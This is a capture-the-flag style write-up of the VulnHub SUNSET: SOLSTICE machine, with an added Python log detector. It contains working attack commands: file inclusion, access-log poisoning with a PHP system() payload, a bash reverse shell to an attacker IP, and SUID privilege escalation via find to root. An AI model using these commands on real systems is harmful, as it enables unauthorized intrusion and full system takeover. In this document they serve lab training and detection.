  • PJzhang: VulnHub target machine, sunset series, SUNSET: SOLSTICE

    猫宁~~~

    Address: https://www.vulnhub.com/entry/sunset-solstice,499/

    The focus here is on the tools and the approach.

    nmap 192.168.43.0/24

    Target machine IP: 192.168.43.127

    nmap -A -p1-65535 192.168.43.127

    21/tcp open ftp
    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    25/tcp open smtp Exim smtpd 4.92
    80/tcp open http Apache httpd 2.4.38 ((Debian))
    139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X
    445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian
    2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
    3128/tcp open squid-http Squid http proxy 4.6
    8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
    54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
    62524/tcp open ftp FreeFloat ftpd 1.00

    http://192.168.43.127/
    http://192.168.43.127:3128/
    http://192.168.43.127:8593/
    http://192.168.43.127:54787/

    dirb http://192.168.43.127/
    nikto -h http://192.168.43.127/

    A file inclusion vulnerability is found:
    http://192.168.43.127:8593/index.php?book=../../../../../../etc/passwd

    http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log

    Run nc 192.168.43.127 80, press Enter, then type GET /<?php system($_GET['cmd']); ?> HTTP/1.1
    or GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1

    bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'

    http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log&cmd=bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'

    On the attacking machine: nc -lvnp 4444

    Obtain a shell:
    python -c 'import pty;pty.spawn("/bin/bash")'
    www-data@solstice:/var/tmp/webserver$

    ps aux | grep root

    root 427 0.0 2.0 196744 21184 ? S 05:55 0:00 /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/

    cd /var/tmp/sv/

    printf "<?php system('chmod o+x /usr/bin/find; chmod +s /usr/bin/find'); ?>" >index.php

    curl 127.0.0.1:57/index.php

    find . -exec /bin/sh -p \; -quit

    whoami
    The output is root
    id
    uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
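
The file-inclusion and access-log steps above leave recognizable request lines in a web access log. The following detector is an added example, not part of the original write-up; it flags PHP open tags in a request line and `../` traversal toward log or system files. The sample lines are constructed, both servers are assumed to log in Apache common/combined format, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Prefix of an Apache common/combined line: host ident user [time] "request" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" (\d{3}) ')
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)          # PHP open tag in the request line
TRAVERSAL = re.compile(r"(?:\.\./){2,}")             # two or more ../ in a row
SENSITIVE = re.compile(r"etc/passwd|var/log/|proc/self/")

def decode(text, rounds=3):
    """Percent-decode repeatedly so %2e%2e%2f and double encoding are normalised."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text.replace("\\", "/")

def classify(line):
    """Return (client, status, findings) for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return None, None, ["unparsed"]
    request = decode(m.group(2))
    findings = []
    if PHP_TAG.search(request):
        findings.append("php-tag-in-request")        # log-poisoning attempt
    if TRAVERSAL.search(request):
        findings.append("path-traversal")
        if SENSITIVE.search(request):
            findings.append("sensitive-file-target")
    return m.group(1), int(m.group(3)), findings

def scan(lines):
    """Keep only the lines that produced at least one finding."""
    return [hit for hit in map(classify, lines) if hit[2]]

# Constructed sample lines modelled on the requests in the write-up (not real logs).
SAMPLE = r'''
192.168.43.154 - - [10/Sep/2020:06:01:12 +0000] "GET /<?php system($_GET['cmd']); ?> HTTP/1.1" 400 301 "-" "-"
192.168.43.154 - - [10/Sep/2020:06:02:40 +0000] "GET /index.php?book=../../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 5120 "-" "curl/7.64.0"
192.168.43.154 - - [10/Sep/2020:06:03:05 +0000] "GET /index.php?book=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1480 "-" "curl/7.64.0"
192.168.43.10 - - [10/Sep/2020:06:04:00 +0000] "GET /index.php?book=dracula HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for client, status, findings in scan(SAMPLE):
        print(client, status, ",".join(findings))
```

A `php-tag-in-request` hit followed by a traversal request that names a log file, both from the same client, is the sequence to alert on.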

  • Original article: https://www.cnblogs.com/landesk/p/13649003.html